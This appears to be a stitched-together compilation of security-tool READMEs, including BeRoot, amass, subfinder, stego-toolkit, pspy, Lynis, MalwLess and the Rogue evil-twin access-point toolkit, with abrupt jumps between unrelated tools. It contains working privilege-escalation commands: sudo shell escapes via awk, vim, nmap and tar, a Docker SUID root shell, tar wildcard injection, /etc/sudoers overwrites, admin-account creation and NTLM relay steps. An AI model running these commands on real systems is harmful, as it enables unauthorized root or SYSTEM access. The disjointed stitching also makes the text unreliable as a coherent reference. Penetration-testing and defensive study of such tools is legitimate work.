|====================================================================|
|                                                                    |
|                    Windows Privilege Escalation                    |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|


usage: beRoot.exe [-h] [-l] [-w] [-c CMD]

Windows Privilege Escalation

optional arguments:
  -h, --help         show this help message and exit
  -l, --list         list all softwares installed (not run by default)
  -w, --write        write output
  -c CMD, --cmd CMD  cmd to execute for the webclient check (default: whoami)

C:\Program Files\Some Test\binary.exe

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\binary.exe

• a service: create a malicious service (or compile the service template)
• a classic executable: Create your own executable.

C:\Program Files\Some Test\binary.exe

• The service is not running:
  
  • Replace the legitimate service by our own, restart it or check how it's triggered (at reboot, when another process is started, etc.).
• The service is running and could not be stopped:
  
• Most exploitation will be like that, checks for dll hijacking and try to restart the service using previous technics.

6.0  =>  Windows Vista / Windows Server 2008
6.1  =>  Windows 7 / Windows Server 2008 R2
6.2  =>  Windows 8 / Windows Server 2012

- Directory where the binary is located
- C:\Windows\System32
- C:\Windows\System
- C:\Windows\
- Current directory where the binary has been launched
- Directory present in %PATH% environment variable

C:\Users\bob\Desktop>type test.txt
[IKEEXTPOC]
MEDIA=rastapi
Port=VPN2-0
Device=Wan Miniport (IKEv2)
DEVICE=vpn
PhoneNumber=127.0.0.1

C:\Users\bob\Desktop>rasdial IKEEXTPOC test test /PHONEBOOK:test.txt

1. Start Webclient service (used to connect to some shares) using some magic tricks (using its UUID)
2. Start an HTTP server locally
3. Find a service which will be used to trigger a SYSTEM NTLM hash.
4. Enable file tracing on this service modifying its registry key to point to our webserver (\\127.0.0.1@port\tracing)
5. Start this service
6. Our HTTP Server start a negotiation to get the SYSTEM NTLM hash
7. Use of this hash with SMB to execute our custom payload (SMBrelayx has been modify to realize this action)
8. Clean everything (stop the service, clean the regritry, etc.).

beRoot.exe -c "net user Zapata LaLuchaSigue /add"
beRoot.exe -c "net localgroup Administrators Zapata /add"

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\System32\Sysprep\unattend.xml 
C:\Windows\System32\Sysprep\Panther\unattend.xml

<UserAccounts>
<LocalAccounts>
<LocalAccount>
<Password>
<Value>RmFrZVBhc3N3MHJk</Value>
<PlainText>false</PlainText>
</Password>
<Description>Local Administrator</Description>
<DisplayName>Administrator</DisplayName>
<Group>Administrators</Group>
<Name>Administrator</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>

• Modify an existing service
• Create a new service
• Modify a startup key (on HKLM)
• Modify directory where all scheduled tasks are stored: "C:\Windows\system32\Tasks"

• awk

sudo awk 'BEGIN {system("/bin/sh")}'

• docker (if you can call docker, no need to run it with sudo)

docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p

• find

sudo find . -type d -exec sh -c id {} \;

• file viewer

less: !bash
man:  !bash or $ sudo man -P whoami man
more:  !bash

• file modifications (cannot be consider as LOLbins but useful for privilege escalation)

cp: sudo cp -f your_file /etc/sudoers
mv: sudo mv -f your_file /etc/sudoers

• ftp / sftp

ftp> ! ls

• git

export PAGER=./runme.sh
sudo git -p help

• mount

sudo mount -o bind /bin/bash /bin/mount
sudo mount

• nmap

echo "os.execute('/bin/sh')" > /tmp/script.nse
sudo nmap --script=/tmp/script.nse

• rsync

echo "whoami > /tmp/whoami" > /tmp/tmpfile
sudo rsync  -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null

cat whoami 
root

• scripting languages

lua:  os.execute('/bin/sh')
perl:  sudo  perl -e 'exec "/bin/sh";'
python: sudo  python -c 'import os;os.system("/bin/sh")'
ruby:  sudo ruby -e 'exec "/bin/sh"'

• tar

sudo tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=sh

• text editor

vi:  sudo vi -c '!sh' or :!bash or :set shell=/bin/bash:shell or :shell
vim :  sudo vim -c '!sh' or :!bash or :set shell=/bin/bash:shell or :shell

• tcpdump

echo "whoami > /tmp/whoami" > /tmp/tmpfile
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root

cat whoami 
root

• wget (overwrite system file - need a web server)

sudo wget http://127.0.0.1/sudoers -O /etc/sudoers

• zip

echo "/bin/sh" > /tmp/run.sh
sudo zip z.zip * -T -TT /tmp/run.sh

mount: only root can use "--options" option

tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=sh

user@host:~$ cat test.sh 
tar cf archive.tar * 

• open nano (with no arguments)
• write something in it
• save file using tar arguments as file names:
  • --checkpoint-action=exec=sh
  • --checkpoint=1

user@host:~$ ls -la 
total 32
-rw-r--r-- 1 user user     5 Jan 12 10:34 --checkpoint-action=exec=sh
-rw-r--r-- 1 user user     3 Jan 12 10:33 --checkpoint=1
drwxr-xr-x 2 user user  4096 Jan 12 10:34 .
drwxr-xr-x 7 user user  4096 Jan 12 10:29 ..
-rwxr-xr-x 1 user user    22 Jan 12 10:32 test.sh

user@host:~$ sudo ./test.sh 
sh-4.3# id
uid=0(root) gid=0(root) groups=0(root)

user@host:~$ cat test.sh 
tar cf archive.tar *.txt

/etc/init.d
/etc/cron.d 
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly
/etc/at.allow
/etc/at.deny
/etc/crontab
/etc/cron.allow
/etc/cron.deny
/etc/anacrontab
/var/spool/cron/crontabs/root

• checks if you have access with write permission on these files.
• checks inside the file, to find other paths with write permissions.
• checks for wildcards (this check could raise false positives, but could also get you useful information). Sometimes, you may need write permissions on a specific folder to create your malicious file (as explained on the wildcard section), this check is not done because it could be done by two many ways on the script and it's difficult to automate.

• checks if we have write permissions on these binary (why not ? :))
• checks if a LOLBin is used as suid to be able to execute system commands using it (remember you could have suid LOLBin without beeing able to exectute commands - checks LOLBin section with the false positive example using mount).

users  hosts = (run-as) tags: commands

User_Alias ADMINS = admin, user, root
Cmnd_Alias ADMIN_CMDS = /sbin/service, /usr/sbin/iptables, python /tmp/file.py
ADMINS ALL = (ALL) NOPASSWD: ADMIN_CMDS

admin,user,root ALL = (ALL) NOPASSWD: /sbin/service, /usr/sbin/iptables, python /tmp/file.py

• if it affects our user or our user's group:
• check if we have write permissions on all possible commands (in our example, it will test "service", "iptables", "python" and "/tmp/files.py")
• check for LOLBins
• check for LOLBins + wildcards
• check if we can impersonate another user ("su" command)
• check write permissions on sensitive files and suid bin for this user
• realize again all these checks on the sudoers file using this new user

git clone --recurse-submodules https://github.com/CERT-Polska/mquery.git
docker-compose up --scale daemon=3

1. Run ursadb database (see ursadb project for further instructions on that topic).
2. Install redis-server and python2.
3. Install requirements: pip install -r requirements.txt
4. Copy config.example.py to config.py, remember to adjust the settings and set unique SECRET_KEY.
5. Setup a flask application originating from webapp.py in your favourite web server.
6. Run daemon.py - a standalone script which should work constantly, consider putting it in systemd.

1. Start up the whole system (see "Installation").
2. Web interface (by default) should be available on http://localhost:80/
3. Upload files to be indexed to the mquery_samples volume. From the host it should be visible at /var/lib/docker/volumes/mquery_samples/_data. If in doubt, debug using docker image inspect mquery_samples command.
4. Open web interface, choose "admin" tab and click "Index /mnt/samples".
5. While indexing, the current progress will be displayed in the "backend" section of "admin" tab (no auto refresh), ursadb will also periodically report something on the console.
6. After successful indexing, your files should be searchable. Go to the main tab and upload some Yara, e.g.:

rule emotet4_basic: trojan
{
    meta:
        author = "psrok1/mak"
        module = "emotet"
    strings:
        $emotet4_rsa_public = { 8d ?? ?? 5? 8d ?? ?? 5? 6a 00 68 00 80 00 00 ff 35 [4] ff 35 [4] 6a 13 68 01 00 01 00 ff 15 [4] 85 }
        $emotet4_cnc_list = { 39 ?? ?5 [4] 0f 44 ?? (FF | A3)}
    condition:
        all of them
}

MalwLess Simulation Tool v1.1
Author: @n0dec
Site: https://github.com/n0dec/MalwLess

[Rule test file]: rule_test.json
[Rule test name]: MalwLess default
[Rule test version]: 0.3
[Rule test author]: n0dec
[Rule test description]: MalwLess default test pack.

[>] Detected rule: rules.vssadmin_delete_shadows
... Source: Sysmon
... Category: Process Create
... Description: Deleted shadows copies via vssadmin.
[>] Detected rule: rules.certutil_network_activity
... Source: Sysmon
... Category: Network connection detected
... Description: Network activity from certutil tool.
[>] Detected rule: rules.powershell_scriptblock
... Source: PowerShell
... Category: 4104
... Description: Powershell 4104 event for Invoke-Mimikatz.

> malwless.exe  

> malwless.exe -r your_pack.json  

> malwless.exe

• Awesome gists sets
• Windows oneliners windows-oneliners.json ref: https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/
• APTSimulator set ref: https://github.com/NextronSystems/APTSimulator
• Endgame RTA set ref: https://github.com/endgameinc/RTA
• WinPwnage set ref: https://github.com/rootm0s/WinPwnage

$ sudo snap install amass

$ sudo snap install --edge amass

1. Download amass:

$ go get -u github.com/caffix/amass

2. Several wordlists can be found in the following directory:

$ ls $GOPATH/src/github.com/caffix/amass/wordlists/

$ amass -d example.com

$ amass -d example1.com,example2.com -d example3.com

$ amass -nodns -d example.com

$ amass -df domains.txt

$ amass -v -ip -brute -min-for-recursive 3 -d example.com
[Google] www.example.com
[VirusTotal] ns.example.com
...
13139 names discovered - archive: 171, cert: 2671, scrape: 6290, brute: 991, dns: 250, alt: 2766

$ amass -ip -d example.com

$ amass -ip -o out.txt -d example.com

$ amass -log amass.log -d example.com

$ amass -json out.txt -d example.com

$ amass -visjs vis.html -d example.com

$ amass -graphistry network.json -d example.com

$ amass -gephi network.gexf -d example.com

$ amass -v -ip -oA amass_scan -d example.com

$ amass -neo4j neo4j:DoNotUseThisPassword@localhost:7687 -d example.com

$ amass -v -d example.com -r 8.8.8.8,1.1.1.1

$ amass -v -d example.com -rf data/resolvers.txt

$ amass -bl blah.example.com -d example.com

$ amass -blf data/blacklist.txt -d example.com

$ amass -noalts -d example.com

$ amass -active -d example.com net -p 80,443,8080

$ amass -brute -d example.com

$ amass -brute -norecursive -d example.com

$ amass -brute -min-for-recursive 3 -d example.com

$ amass -brute -w wordlist.txt -d example.com

$ amass -freq 120 -d example.com

$ amass -whois -d example.com

$ amass -whois -l -d example.com

$ amass net -asn 13374,14618

$ amass net -cidr 192.184.113.0/24,104.154.0.0/15

$ amass net -addr 192.168.1.44,192.168.2.1-64

$ amass net -cidr 192.168.1.0/24 -p 80,443,8080

import(
    "fmt"
    "math/rand"
    "time"

    "github.com/caffix/amass/amass"
)

func main() {
    output := make(chan *amass.AmassOutput)

    go func() {
        for result := range output {
            fmt.Println(result.Name)
        }
    }()

    // Seed the default pseudo-random number generator
    rand.Seed(time.Now().UTC().UnixNano())

    // Setup the most basic amass configuration
    config := amass.CustomConfig(&amass.AmassConfig{Output: output})
    config.AddDomains([]string{"example.com"})

    // Begin the enumeration process
    amass.StartEnumeration(config)
}

1. Setup a new local transform within Maltego:

2. Configure the local transform to properly execute the go program:

3. Go into the Transform Manager, and disable the debug info option:

• Infromation Modules :
  
• Port Scanner
  
• Whois Lookup
  
• Reverse IP Domain Lookup
  
• HTTP Header Domain Lookup
  
• Iplocator Retrieve Ip Geolocation Info
  
• Hash Modules :
  
• Md5 Encode Text
  
• Sha1 Encode Text
  
• SHA256 Encode Text
  
• SHA384 Encode Text
  
• SHA512 Encode Text
  
• Scanner Modules :
  
• Cross Site Scripting (XSS)
  
• SQL Injection Scanner (SQL)
  
• Dork Search SQL Injection Vuln
  
• Remote Code Execution Scanner (RCE)
  
• Website Admin Panel Scanner Finder
  

1. Build image (docker build -t <image_name> .) or pull from Docker hub (docker pull dominicbreuker/stego-toolkit)
2. Start a container with your files mounted to the folder /data (docker run -it <image_name> -v /local/folder/with/data:/data /bin/bash)
3. Use CLI tools and screening scripts on your files: e.g., run check_jpg.sh image.jpg to create a quick report, or run brute_jpg.sh image.jpg wordlist.txt to try extracting hidden data with various tools and passwords
4. If you want to run GUI tools use one of these two ways:

• Run start_ssh.sh and connect to your container with X11 forwarding
• Run start_vnc.sh and connect to the container's Desktop through your browser

• What tools are installed? Go here
• What scripts can I run to quickly screen files automatically or brute force them? Go here
• How can I play with different Steganography examples to see if I can break them? Go here
• How can I run GUI tools inside the container? go here

• run start_ssh.sh to fire up an SSH server. Connect afterwards with X11 forwarding. Requires an X11 server on your host!
• run start_vnc.sh to fire up a VNC server + client. Connect afterwards with your browser to port 6901 and you get an Xfce desktop. No host dependencies!

• XXX_check.sh <stego-file>: runs basic screening tools and creates a report (+ possibly a directory with reports in files)
• XXX_brute.sh <stego-file> <wordlist>: tries to extract a hidden message from a stego file with various tools using a wordlist (cewl, john and crunch are installed to generate lists - keep them small).

• JPG: check_jpg.h and brute_jpg.sh (brute running steghide, outguess, outguess-0.13, stegbreak, stegoveritas.py -bruteLSB)
• PNG: check_png.h and brute_png.sh (brute running openstego and stegoveritas.py -bruteLSB)

• john: the community enhanced version of John the Ripper can expand your wordlists. Create a base wordlist with a few candidate passwords and use john to create many variants of them. Use john -wordlist:/path/to/your/wordlist -rules:Single -stdout > /path/to/expanded/wordlist to apply extensive rules (~x1000) john -wordlist:/path/to/your/wordlist -rules:Wordlist -stdout > /path/to/expanded/wordlist for a reduced ruleset (~x50).
• crunch: can generate small wordlists if you have a pattern in mind. For instance, if you know the passwords ends with 1984 and is 6 letters long, use crunch 6 6 abcdefghijklmnopqrstuvwxyz -t @@1984 will generate the 26 * 26 = 676 passwords aa1984, ab1984, ... up to zz1984. The format is crunch <min-length> <max-length> <charset> <options> and we used the templating option. Check out less /usr/share/crunch/charset.lst to see the charsets crunch ships with.
• CeWL: can generate wordlists if you know a website is related to a password. For instance, run cewl -d 0 -m 8 https://en.wikipedia.org/wiki/Donald_Trump if you suspect a picture of Donald Trump contains an encrypted hidden message. The command scrapes the site and extracts strings at least 8 characters long.

• /examples/ORIGINAL.jpg
• /examples/ORIGINAL.png
• /examples/ORIGINAL.mp3
• /examples/ORIGINAL.wav

• run on Linux, you probably have X11
• run on Mac OS, you need Xquartz (brew install Xquartz)
• run on Windows, you have a problem

# in 1st host shell
docker run -it --rm -p 127.0.0.1:22:22 dominicbreuker/stego-toolkit /bin/bash

# inside container shell
start_ssh.sh

# in 2nd host shell (use it to launch GUI apps afterwards)
ssh -X -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no root@localhost

# in 1st host shell
docker run -it --rm -p 127.0.0.1:6901:6901 dominicbreuker/stego-toolkit /bin/bash

# inside container shell
start_vnc.sh

# in browser, connect with: http://localhost:6901/?password=<password_from_start_vnc>

• You must be able to spot codes. Check out this cheat sheet from Eric Harshbarger, which contains many different codes.
• Cheatsheet describing workflows, things to look for and common tools: click
• Forensics CTF guide with lots of ideas for stego challenges: click
• File format descriptions as beautiful posters: click

• Demo image (JPG, PNG): https://pixabay.com/p-1685092
• Demo sound file (MP3, WAV): https://upload.wikimedia.org/wikipedia/commons/c/c5/Auphonic-wikimedia-test-stereo.ogg --- By debuglevel (Own work) [CC BY-SA 3.0 (https://creativecommons.org/licenses/by-sa/3.0)], via Wikimedia Commons

• 32 bit big, static version: pspy32
• 64 bit big, static version: pspy64
• 32 bit small version: pspy32s
• 64 bit small version: pspy64s The statically compiled files should work on any Linux system but are quite huge (~4MB). If size is an issue, try the smaller versions which depend on libc and are compressed with UPX (<1MB).

• -p: enables printing commands to stdout (enabled by default)
• -f: enables printing file system events to stdout (disabled by default)
• -r: list of directories to watch with Inotify. pspy will watch all subdirectories recursively (by default, watches /usr, /tmp, /etc, /home, /var, and /opt).
• -d: list of directories to watch with Inotify. pspy will watch these directories only, not the subdirectories (empty by default).
• -i: interval in milliseconds between procfs scans. pspy scans regularly for new processes regardless of Inotify events, just in case some events are not received.
• -c: print events in different colors. Red for new processes, green for new Inotify events.

# print both commands and file system events and scan procfs every 1000 ms (=1sec)
./pspy64 -pf -i 1000 

# place watchers recursively in two directories and non-recursively into a third
./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir

# disable printing discovered commands but enable file system events
./pspy64 -p=false -f

~/pspy (master) $ make example
[...]
docker run -it --rm local/pspy-example:latest
[+] cron started
[+] Running as user uid=1000(myuser) gid=1000(myuser) groups=1000(myuser),27(sudo)
[+] Starting pspy now...
Watching recursively    : [/usr /tmp /etc /home /var /opt] (6)
Watching non-recursively: [] (0)
Printing: processes=true file-system events=false
2018/02/18 21:00:03 Inotify watcher limit: 524288 (/proc/sys/fs/inotify/max_user_watches)
2018/02/18 21:00:03 Inotify watchers set up: Watching 1030 directories - watching now
2018/02/18 21:00:03 CMD: UID=0    PID=9      | cron -f
2018/02/18 21:00:03 CMD: UID=0    PID=7      | sudo cron -f
2018/02/18 21:00:03 CMD: UID=1000 PID=14     | pspy
2018/02/18 21:00:03 CMD: UID=1000 PID=1      | /bin/bash /entrypoint.sh
2018/02/18 21:01:01 CMD: UID=0    PID=20     | CRON -f
2018/02/18 21:01:01 CMD: UID=0    PID=21     | CRON -f
2018/02/18 21:01:01 CMD: UID=0    PID=22     | python3 /root/scripts/password_reset.py
2018/02/18 21:01:01 CMD: UID=0    PID=25     |
2018/02/18 21:01:01 CMD: UID=???  PID=24     | ???
2018/02/18 21:01:01 CMD: UID=0    PID=23     | /bin/sh -c /bin/echo -e "KI5PZQ2ZPWQXJKEL\nKI5PZQ2ZPWQXJKEL" | passwd myuser
2018/02/18 21:01:01 CMD: UID=0    PID=26     | /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root
2018/02/18 21:01:01 CMD: UID=101  PID=27     |
2018/02/18 21:01:01 CMD: UID=8    PID=28     | /usr/sbin/exim4 -Mc 1enW4z-00000Q-Mk

• AIX
• FreeBSD
• HP-UX
• Linux
• Mac OS
• NetBSD
• OpenBSD
• Solaris
• and others

1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
4. Run tests from enabled plugins
5. Run security tests per category
6. Report status of security scan

• Security auditing
• Compliance testing (e.g. PCI, HIPAA, SOx)
• Vulnerability detection and scanning
• System hardening

• Best practices
• CIS
• NIST
• NSA
• OpenSCAP data
• Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Lynis 2.6.5 (2018-06-26)

Tests:
------

* [MAIL-8804] - Exim configuration test
* [NETW-2704] - Use FQDN to test status of a nameserver instead of own IP address
* [SSH-7402] - Improved test to allow configurations with a Match block

Lynis 2.6.4 (2018-05-02)

Changes:
--------
* Several contributions merged, including grammar improvements
* Initial support for Ubuntu 18.04 LTS
* Small enhancements for usage

Tests:
------
* [AUTH-9308] - Made 'sulogin' more generic for systemd rescue shell
* [DNS-1600] - Initial work on DNSSEC validation testing
* [NETW-2704] - Added support for local resolver 127.0.0.53
* [PHP-2379] - Suhosin test disbled
* [SSH-7408] - Removed 'DELAYED' from OpenSSH Compression setting
* [TIME-3160] - Improvements to detect step-tickers file and entries

• Alisson Moretto | Twitter: @A1S0N_ Github: @A1S0N

• Python 3.x
• pip3
• subprocess from python3
• Discord from python3

• Kali Linux - Rolling Edition
  
• Linux Mint - 18.3 Sylvia
  
• Ubuntu - 16.04.3 LTS
  
• MacOS High Sierra
  

git clone https://github.com/UndeadSec/Idisagree.git

cd Idisagree
sudo pip3 install -r requirements.txt
python3 Idisagree.py

• Simple and modular code base making it easy to contribute.
• Fast And Powerful Bruteforcing Module
• Powerful Permutation generation engine. (In Development)
• Many Passive Data Sources (30 At Present)
• Multiple Output formats

Ask, Archive.is, Baidu, Bing, Censys, CertDB, CertSpotter, CrtSH, DnsDB, DNSDumpster, Dogpile, Entrust CT-Search, Exalead, FindSubdomains, GoogleTER, Hackertarget, IPv4Info, Netcraft, PassiveTotal, PTRArchive, Riddler, SecurityTrails, SiteDossier, Shodan, SSL Certificates, ThreatCrowd, ThreatMiner, Virustotal, WaybackArchive, Yahoo 

./subfinder -h 

go get github.com/subfinder/subfinder

go get -u github.com/subfinder/subfinder

• Clone the repo using git clone https://github.com/subfinder/subfinder.git
• Build your docker container

docker build -t subfinder .

• After building the container, run the following.

docker run -it subfinder

The above command is the same as running -h

docker run -v $HOME/.config/subfinder:/root/.config/subfinder -it subfinder -d uber.com > uber.com.txt

• Virustotal
• Passivetotal
• SecurityTrails
• Censys
• Riddler
• Shodan

VirustotalAPIKey 
PassivetotalUsername 
PassivetotalKey
SecurityTrailsKey
RiddlerEmail
RiddlerPassword
CensysUsername
CensysSecret
ShodanAPIKey

./subfinder --set-config VirustotalAPIKey=0x41414141
./subfinder --set-config PassivetotalUsername=hacker,PassivetotalKey=supersecret

mkdir $HOME/.config/subfinder
cp config.json $HOME/.config/subfinder/config.json
nano $HOME/.config/subfinder/config.json

sudo docker run -v $HOME/.config/subfinder:/root/.config/subfinder -it subfinder -d freelancer.com

./subfinder -d freelancer.com

[CERTSPOTTER] www.fi.freelancer.com
[DNSDUMPSTER] hosting.freelancer.com
[DNSDUMPSTER] support.freelancer.com
[DNSDUMPSTER] accounts.freelancer.com
[DNSDUMPSTER] phabricator.freelancer.com
[DNSDUMPSTER] cdn1.freelancer.com
[DNSDUMPSTER] t1.freelancer.com
[DNSDUMPSTER] wdc.t1.freelancer.com
[DNSDUMPSTER] dal.t1.freelancer.com

./subfinder -d freelancer.com -o output.txt

./subfinder -d freelancer.com --sources censys --set-settings CensysPages=2 -v 

CensysPages
AskPages
BaiduPages
BingPages

./subfinder -d freelancer.com -b -w jhaddix_all.txt -t 100 --sources censys --set-settings CensysPages=2 -v 

./subfinder -d freelancer.com -o result_aquatone.json -oT -nW -v 

./subfinder -d freelancer.com -o result_aquatone.json -oT -nW -v -r 8.8.8.8,1.1.1.1
./subfinder -d freelancer.com -o result_aquatone.json -oT -nW -v -rL resolvers.txt

./subfinder -d freelancer.com --no-passive -v -b -w ~/dnslist.txt

• Compromising corporate accounts to be later used in impersonation attacks to gain access to corporate wireless networks.
• To subvert network protections, such as captive portals or client to client isolation, to be able to target and compromise connected wireless devices and using compromised devices and credentials to pivot deeper into internal networks.

usage: python rogue.py -I wlan0 -H g -C 6 --auth open --internet

The Rogue Toolkit is an extensible toolkit aimed at providing penetration
testers an easy-to-use platform to deploy software-defined Access Points (AP)
for the purpose of conducting penetration testing and red team engagements. By
using Rogue, penetration testers can easily perform targeted evil twin attacks
against a variety of wireless network types.

optional arguments:
  -h, --help            show this help message and exit
  -w PCAP_FILENAME, --write PCAP_FILENAME
                        Write all collected wireless frames to a pcap file.
  --internet            Provide network access
  --auth {open,wep,wpa-personal,wpa-enterprise}
                        Specify auth type. (Default: open)
  --cert-wizard         Use this flag to create a new RADIUS cert for your AP
  --clone-wizard        Used to clone a target website
  --show-options        Display configured options.
  -I INTERFACE, --interface INTERFACE
                        The phy interface on which to create the AP

hostapd configuration:
  --driver {hostap,nl80211,atheros,wired,none,bsd}
                        Choose the hostapd-wpe driver

Attack Arguments:
  --karma               Enable Karma.
  --sslsplit            Enable sslsplit.
  --responder           Enable responder using default configuration.
  --essid-mask {0,1,2}  Send empty SSID in beacons and ignore probe request
                        frames that do not specify full SSID. 1 = send empty
                        (length=0) SSID in beacon and ignore probe request for
                        broadcast SSID 2 = clear SSID (ASCII 0), but keep the
                        original length (this may be required with some
                        clients that do not support empty SSID) and ignore
                        probe requests for broadcast SSID (Default: 0)
  --hostile-portal      Enable hostile portal.
  --hostile-mode {beef,responder}
                        Select attack type performed by hostile portal.
  --hostile-location HOSTILE_LOCATION
                        Used to specify the location of the cloned site
                        location. Note: httrack creates a new directory within
                        the destination location with the name of the site
                        cloned. (Default: /var/www/html)
  --target-file TARGET_FILE
                        Used to specify the file in which the hostile portal
                        hook will be inserted into. (Default: /index.html)
  --hostile-marker HOSTILE_MARKER
                        Specify the line in the file target file to insert the
                        web hook above. (Default: </body> )
  --hostile-hook HOSTILE_HOOK
                        Specify custom hook code to insert into the target
                        file

IEEE 802.11 related configuration:
  -B BSSID, --bssid BSSID
                        Specify access point BSSID
  -E ESSID, --essid ESSID
                        Specify access point ESSID
  -H {a,b,g,n,ac}, --hw-mode {a,b,g,n,ac}
                        Specify access point hardware mode (Default: g).
  --freq {2,5}          Specify the radio band to use (Default: 2GHz).
  -C CHANNEL, --channel CHANNEL
                        Specify access point channel. (Default: 0 - with ACS
                        to find an unused channel)
  --country {AU,US}     Configures of country of operation
  --macaddr-acl {0,1,2}
                        Station MAC address -based authentication
  --auth-algs {1,2,3}   IEEE 802.11 specifies two authentication algorithms. 1
                        allows only WPA2 authentication algorithms. 2 is WEP.
                        3 allows both.
  --wmm-enabled         Enable Wireless Multimedia Extensions
  --ieee80211d          Enabling IEEE 802.11d advertises the country_code and
                        the set of allowed channels and transmit power levels
                        based on the regulatory limits. (Default: False)
  --ieee80211h          Enables radar detection and DFS support. DFS support
                        is required for an outdoor 5 GHZ channel. (This can
                        only be used if ieee80211d is enabled). (Default:
                        False)
  --ap-isolate          Enable client isolation to prevent low-level bridging
                        of frames between associated stations in the BSS.
                        (Default: disabled)

IEEE 802.11n related configuration:
  --ht-mode {0,1,2}     Configure supported channel width set 0 = Feature
                        disabled 1 = [HT40-] (2.4 GHz = 5-13, 5 GHz =
                        40,48,56,64) 2 = [HT40+] (2.4 GHz = 1-7 (1-9 in
                        Europe/Japan), 5 GHz = 36,44,52,60) (Default = 0).
  --disable-short20     Disables Short GI for 20 MHz for HT capabilities.
  --disable-short40     Disables Short GI for 40 MHz for HT capabilities.
  --require-ht          Require stations to support HT PHY (reject association
                        if they do not). (Default: False)

IEEE 802.11ac related configuration:
  --vht-width {0,1,2,3}
                        VHT channel width (Default: 1).
  --vht-seg0_index VHT_OPER_CENTR_FREQ_SEG0_IDX
                        index 42 gives center freq 5.210 GHz (Default: 42).
  --vht-seg1_index VHT_OPER_CENTR_FREQ_SEG1_IDX
                        index 159 gives center freq 5.795 GHz (Default: 159).
  --require-vht         Require stations to support VHT PHY (reject
                        association if they do not) (Default: disabled).

IWPA/IEEE 802.11i configuration:
  --wpa-passphrase WPA_PASSPHRASE
                        Specify the Pre-Shared Key for WPA network.
  --wpa {1,2,3}         Specify WPA type (Default: 2).
  --wpa-pairwise {CCMP,TKIP,CCMP TKIP}
                        (Default: 'CCMP TKIP')
  --rsn-pairwise {CCMP,TKIP,CCMP TKIP}
                        (Default: 'CCMP')

WEP authentication configuration:
  --wep-key-version {0,1,2,3}
                        Determine the version of the WEP configuration
  --wep-key WEP_KEY     Determine the version of the WEP configuration

IEEE 802.1X-2004 configuration:
  --ieee8021x           Enable 802.1x
  --eapol-version {1,2}
                        IEEE 802.1X/EAPOL version
  --eapol-workaround    EAPOL-Key index workaround (set bit7) for WinXP
                        Supplicant

RADIUS client configuration:
  --log-badpass         logs password if it's rejected
  --log-goodpass        logs password if it's correct
  --own-address OWN_IP_ADDR
                        The own IP address of the access point (Default:
                        127.0.0.1)
  --auth-server-addr AUTH_SERVER_ADDR
                        IP address of radius authentication server (Default:
                        127.0.0.1)
  --auth-secret AUTH_SERVER_SHARED_SECRET
                        Radius authentication server shared secret (Default:
                        secret)
  --auth-server-port AUTH_SERVER_PORT
                        Networking port of radius authentication server
                        (Default: 1812)
  --acct-server-addr ACCT_SERVER_ADDR
                        IP address of radius accounting server (Default:
                        127.0.0.1)
  --acct-secret ACCT_SERVER_SHARED_SECRET
                        Radius accounting server shared secret
  --acct-server-port ACCT_SERVER_PORT
                        Networking port of radius accounting server (Default:
                        1813)
  --radius-proto {udp,tcp,*}
                        (Default: *)
  --eap-type {fast,peap,ttls,tls,leap,pwd,md5,gtc}
                        (Default: md5)
  --print-creds         Print intercepted credentials

External DHCP configuration:
  --lease DEFAULT_LEASE_TIME
                        Define DHCP lease time (Default: 600)
  --max-lease MAX_LEASE_TIME
                        Define max DHCP lease time (Default: 7200)
  --prim-name-server PRIMARY_NAME_SERVER
                        Define primary name server (Default: 8.8.8.8)
  --sec-name-server SECONDARY_NAME_SERVER
                        Define secondary name server (Default: 8.8.4.4)
  --subnet DHCP_SUBNET  (Default: 10.254.239.0)
  --route-subnet ROUTE_SUBNET
                        (Default: 10.254.239)
  --netmask DHCP_NETMASK
                        (Default: 255.255.255.0)
  --ip-address IP_ADDRESS
                        (Default: 10.254.239.1)
  --secondary-interface SECONDARY_INTERFACE
                        Used to specify the second phy interface used to
                        bridge the hostapd-wpe interface (-I) with another
                        network (Default: eth0)
  --pool-start DHCP_POOL_START
                        (Default: 10.254.239.10)
  --pool-end DHCP_POOL_END
                        (Default: 10.254.239.70)

Website cloning configuration:
  --clone-target CLONE_TARGET
                        Used to specify target website to clone (e.g.
                        https://www.example.com/)
  --clone-dest CLONE_DEST
                        Specify the location of the web root for the hostile
                        portal, it is recommended that you clone to your web
                        root. Note: httrack will create a directory in this
                        location with the name of the site cloned. (Default:
                        /var/www/html)

sslsplit configuration:
  --cert-nopass         Generate a x.509 Certificate with no password for the
                        purpose of sslsplit.
  --encrypted-port SSLSPLIT_ENCRYPTED_PORT
                        Specify port for encrypted web communication (TCP/443)
                        be redirected to. (Default: 8443)

HTTPD configuration:
  --httpd-port HTTPD_PORT
                        defines the port for httpd service to listen on.
                        (Default: 80)
  --httpd-ssl-port HTTP_SSL_PORT
                        Defines port for SSL-enabled httpd service to listen
                        on. (Default: 443)
  --ssl                 Enable ssl version of rogue httpd. When enabled,
                        --httpd-ssl-port overwrites --httpd-port. (Default:
                        443)

• Invoke-IkeextCheck - Only checks whether the machine is vulnerable.
